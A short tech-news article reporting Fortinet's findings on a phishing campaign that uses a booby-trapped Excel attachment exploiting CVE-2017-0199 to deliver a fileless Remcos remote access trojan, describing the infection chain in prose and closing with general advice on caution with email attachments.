- A new phishing campaign was recently detected that distributed an Excel file
- The file places a fileless version of Remcos RAT on the device
- Remcos can steal sensitive files, registry keys and more
Hackers have been seen distributing a fileless version of the Remcos Remote Access Trojan (RAT), which they then use to steal sensitive information from target devices using hijacked spreadsheet software.
In a technical analysis, Fortinet researchers said they observed threat actors sending phishing emails with the usual purchase order subject. Attached to the email is a Microsoft Excel file, created to exploit a remote code execution vulnerability found in Office (CVE-2017-0199). When enabled, the file will download an HTML application (HTA) file from a remote server and launch it via mshta.exe.
The downloaded file will pull a second payload from the same server, which will run the initial anti-analysis and anti-debugging, after which it will download and run Remcos RAT.
Remcos returns
For its part, Remcos was not always considered malware. It was created as legitimate commercial software, used for remote administration tasks. However, it was hijacked by cybercriminals, in the same way that Cobalt Strike was hijacked, and today it is mainly used for unauthorized access, data theft, and espionage. Remcos can log keystrokes, take screenshots and execute commands on infected systems.
But this version of Remcos is placed directly into the device's memory: “Instead of saving the Remcos file to a local file and running it, it deploys Remcos directly into the memory of the current process,” Fortinet explained. “In other words, it is a fileless variant of Remcos.”
Email phishing remains one of the most popular ways cybercriminals infect devices with malware and steal sensitive information. It is cheap to run and works well, making it a very efficient attack vector. The best way to defend against phishing is to use common sense when reading emails and be very careful when downloading and executing attachments.